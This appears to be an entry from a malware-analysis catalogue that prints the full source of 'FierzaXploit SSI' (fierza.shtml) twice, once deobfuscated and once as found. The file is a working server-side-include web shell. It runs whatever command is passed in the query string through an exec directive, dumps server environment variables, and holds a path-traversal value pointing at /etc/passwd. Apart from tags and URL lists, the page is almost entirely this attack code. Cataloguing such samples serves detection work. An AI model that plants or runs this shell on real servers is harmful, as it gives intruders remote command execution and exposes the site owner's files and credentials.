PHP Malware Analysis

Back to list

Filename: fierza.shtml

Tags

URLs
Emails
  • bootstrap@5.1.3
  • aos@2.3.1
  • bootstrap-icons@1.8.1

Deobfuscated code

<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"> <link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.8.1/font/bootstrap-icons.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css" /> <link rel="stylesheet" href="https://fierzaeriez.github.io/gayaku.css"> <link rel="stylesheet" href="https://fierzaeriez.github.io/battery.css"> <style> body {overflow-x: hidden !important;}.tombol {width: 100%;color: white;}</style> <script src='//cdn.jsdelivr.net/npm/sweetalert2@11'></script> <script src="https://fierzaeriez.github.io/battery.js"></script> <title></title> <script language="javascript"> function fex() {document.location.href = "<!--#echo var=DOCUMENT_NAME -->?" + document.getElementById('command').value;}function vfile() {document.location.href = "<!--#echo var=DOCUMENT_NAME -->?cat " + document.getElementById('vfile').value;}</script> </head> <body class="animate__animated animate__bounceIn bg-dark text-white"> <nav class="nav-batrei navbar navbar-expand-lg navbar-dark bg-dark fixed-top" data-aos="zoom-out"> <div class="container-fluid"> <p class="text-white mt-2"><i class="bi bi-check-circle"></i> Version : 1.0 (release)</p> <div class="ms-auto"> <div class="btn-group tombol-batrei"> <div class="dropdown"> <button data-aos="fade-up" data-aos-anchor-placement="top-center" class="btn btn-dark btn-sm mt-0 dropdown-toggle" type="button" id="dropdownMenu2" data-bs-toggle="dropdown" aria-expanded="false"> <i class="bi bi-bell-fill"></i> </button> <div id="notif" class="dropdown-menu dropdown-menu-end" aria-labelledby="dropdownMenu2"> <div class='container-fluid'> <ul class='list-group'> <li class='list-group-item active' aria-current='true'> <center>Version 1.0</center> </li> <li class='list-group-item'>New Realese FierzaXploit SSI</li> </ul> </div> </div> </div> <button data-aos="fade-up" data-aos-anchor-placement="top-center" class="btn btn-dark btn-sm dropdown-toggle" type="button" data-bs-toggle="dropdown" aria-expanded="false"> <i id="baterainya"></i> </button> <ul class="dropdown-menu dropdown-menu-end"> <li> <h5 class="geser">Battery :</h5> <center> <h5 id="batre"></h5> </center> </li> <hr> <li class="geser st"> <div id="charging">(charging state unknown)</div> <div id="dischargingTime">(discharging time unknown)</div> </li> </ul> </div> </div> </div> </nav> <div class="container-fluid"> <br> <center><img data-aos="zoom-in" class="mt-5 gambar bg-dark border-dark" src="https://i.ibb.co/HGNQWNW/fococlipping-20211224-85315.png" alt="" width="100" height="100" class="d-inline-block align-text-top"><br><label data-aos="fade-left" data-aos-anchor="#example-anchor" data-aos-offset="500" data-aos-duration="2000" for="exampleFormControlInput1" class="mb-2 text-white form-label">- FierzaXploit SSI -<br>Simple,Responsive & Powerfull</label> </center> <!--#config errmsg='<center><div class="alert alert-danger alert-dismissible fade show" role="alert" data-aos="fade-right"><strong>Hey!!, Terjadi Masalah Pada Shell!</strong><br>[ Error In Shell ]<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button></div></center>'--> <!--#set var="zero" value="" --> <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --> <!--#set var="shl" value="ls -al" --> <!--#else --> <!--#set var="shl" value=$QUERY_STRING_UNESCAPED --> <!--#endif --> <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --> <!--#set var="inc" value="/../../../../../../../etc/passwd" --> <!--#else --> <!--#set var="inc" value=$QUERY_STRING_UNESCAPED --> <!--#endif --> <h5 class="mt-3"><b><i class="bi bi-info-circle"></i> Information :</b></h5> <ul class="list-unstyled" data-aos="fade-right"> <li> <font color=white>GMT date</font> : <!--#echo var=DATE_GMT --> <br> <font color=white>Local date</font> : <!--#echo var=DATE_LOCAL --> <br> <font color=white>Document name</font> : <!--#echo var=DOCUMENT_NAME --> <br> <font color=white>Document URI</font> : <!--#echo var=DOCUMENT_URI --> <br> <font color=white>Last modified</font> : <!--#echo var=LAST_MODIFIED --> <br> <font color=white>Owner</font> : <!--#echo var=USER_NAME --> <br> <font color=white>More Information</font> : <button class="btn btn-dark" type="button" data-bs-toggle="collapse" data-bs-target="#collapseExample" aria-expanded="false" aria-controls="collapseExample"> <i class="bi bi-eye"></i> View </button> <div class="collapse" id="collapseExample"> <div class="card card-body bg-dark"> <p> <!--#printenv--> </p> </div> </div> </li> </ul> <div class="shell" data-aos="fade-right" data-aos-anchor-placement="center-bottom"> <div class="mb-3"> <label for="exampleFormControlTextarea1" class="form-label"><strong>Result :</strong></label> <textarea class="form-control form-control-sm bg-dark text-white" id="exampleFormControlTextarea1" rows="20" aria-label="Disabled input example" disabled readonly><!--#exec cmd=$shl --> </textarea> </div> </div> <div class="mb-3"> <label for="exampleFormControlInput1" class="form-label">Terminal :</label> <input type="text" class="form-control bg-dark text-white" id="command" placeholder="Please Input Your Command"> </div> <button type="submit" class="btn btn-outline-secondary tombol" onclick="fex()">Run Command</button> <br><br> <div class="footer" data-aos="fade-up" data-aos-anchor-placement="bottom-bottom"> <p class="text-white text-center">Design & Developed By FierzaXploit<br>Copyright <i class="bi bi-signpost-split"></i> 2022</p> </div> </div> <script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script> <script> AOS.init();</script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script> </body> </html>


Original code

<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"> <link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.8.1/font/bootstrap-icons.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css" /> <link rel="stylesheet" href="https://fierzaeriez.github.io/gayaku.css"> <link rel="stylesheet" href="https://fierzaeriez.github.io/battery.css"> <style> body {overflow-x: hidden !important;}.tombol {width: 100%;color: white;}</style> <script src='//cdn.jsdelivr.net/npm/sweetalert2@11'></script> <script src="https://fierzaeriez.github.io/battery.js"></script> <title></title> <script language="javascript"> function fex() {document.location.href = "<!--#echo var=DOCUMENT_NAME -->?" + document.getElementById('command').value;}function vfile() {document.location.href = "<!--#echo var=DOCUMENT_NAME -->?cat " + document.getElementById('vfile').value;}</script> </head> <body class="animate__animated animate__bounceIn bg-dark text-white"> <nav class="nav-batrei navbar navbar-expand-lg navbar-dark bg-dark fixed-top" data-aos="zoom-out"> <div class="container-fluid"> <p class="text-white mt-2"><i class="bi bi-check-circle"></i> Version : 1.0 (release)</p> <div class="ms-auto"> <div class="btn-group tombol-batrei"> <div class="dropdown"> <button data-aos="fade-up" data-aos-anchor-placement="top-center" class="btn btn-dark btn-sm mt-0 dropdown-toggle" type="button" id="dropdownMenu2" data-bs-toggle="dropdown" aria-expanded="false"> <i class="bi bi-bell-fill"></i> </button> <div id="notif" class="dropdown-menu dropdown-menu-end" aria-labelledby="dropdownMenu2"> <div class='container-fluid'> <ul class='list-group'> <li class='list-group-item active' aria-current='true'> <center>Version 1.0</center> </li> <li class='list-group-item'>New Realese FierzaXploit SSI</li> </ul> </div> </div> </div> <button data-aos="fade-up" data-aos-anchor-placement="top-center" class="btn btn-dark btn-sm dropdown-toggle" type="button" data-bs-toggle="dropdown" aria-expanded="false"> <i id="baterainya"></i> </button> <ul class="dropdown-menu dropdown-menu-end"> <li> <h5 class="geser">Battery :</h5> <center> <h5 id="batre"></h5> </center> </li> <hr> <li class="geser st"> <div id="charging">(charging state unknown)</div> <div id="dischargingTime">(discharging time unknown)</div> </li> </ul> </div> </div> </div> </nav> <div class="container-fluid"> <br> <center><img data-aos="zoom-in" class="mt-5 gambar bg-dark border-dark" src="https://i.ibb.co/HGNQWNW/fococlipping-20211224-85315.png" alt="" width="100" height="100" class="d-inline-block align-text-top"><br><label data-aos="fade-left" data-aos-anchor="#example-anchor" data-aos-offset="500" data-aos-duration="2000" for="exampleFormControlInput1" class="mb-2 text-white form-label">- FierzaXploit SSI -<br>Simple,Responsive & Powerfull</label> </center> <!--#config errmsg='<center><div class="alert alert-danger alert-dismissible fade show" role="alert" data-aos="fade-right"><strong>Hey!!, Terjadi Masalah Pada Shell!</strong><br>[ Error In Shell ]<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button></div></center>'--> <!--#set var="zero" value="" --> <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --> <!--#set var="shl" value="ls -al" --> <!--#else --> <!--#set var="shl" value=$QUERY_STRING_UNESCAPED --> <!--#endif --> <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --> <!--#set var="inc" value="/../../../../../../../etc/passwd" --> <!--#else --> <!--#set var="inc" value=$QUERY_STRING_UNESCAPED --> <!--#endif --> <h5 class="mt-3"><b><i class="bi bi-info-circle"></i> Information :</b></h5> <ul class="list-unstyled" data-aos="fade-right"> <li> <font color=white>GMT date</font> : <!--#echo var=DATE_GMT --> <br> <font color=white>Local date</font> : <!--#echo var=DATE_LOCAL --> <br> <font color=white>Document name</font> : <!--#echo var=DOCUMENT_NAME --> <br> <font color=white>Document URI</font> : <!--#echo var=DOCUMENT_URI --> <br> <font color=white>Last modified</font> : <!--#echo var=LAST_MODIFIED --> <br> <font color=white>Owner</font> : <!--#echo var=USER_NAME --> <br> <font color=white>More Information</font> : <button class="btn btn-dark" type="button" data-bs-toggle="collapse" data-bs-target="#collapseExample" aria-expanded="false" aria-controls="collapseExample"> <i class="bi bi-eye"></i> View </button> <div class="collapse" id="collapseExample"> <div class="card card-body bg-dark"> <p> <!--#printenv--> </p> </div> </div> </li> </ul> <div class="shell" data-aos="fade-right" data-aos-anchor-placement="center-bottom"> <div class="mb-3"> <label for="exampleFormControlTextarea1" class="form-label"><strong>Result :</strong></label> <textarea class="form-control form-control-sm bg-dark text-white" id="exampleFormControlTextarea1" rows="20" aria-label="Disabled input example" disabled readonly><!--#exec cmd=$shl --> </textarea> </div> </div> <div class="mb-3"> <label for="exampleFormControlInput1" class="form-label">Terminal :</label> <input type="text" class="form-control bg-dark text-white" id="command" placeholder="Please Input Your Command"> </div> <button type="submit" class="btn btn-outline-secondary tombol" onclick="fex()">Run Command</button> <br><br> <div class="footer" data-aos="fade-up" data-aos-anchor-placement="bottom-bottom"> <p class="text-white text-center">Design & Developed By FierzaXploit<br>Copyright <i class="bi bi-signpost-split"></i> 2022</p> </div> </div> <script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script> <script> AOS.init();</script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script> </body> </html>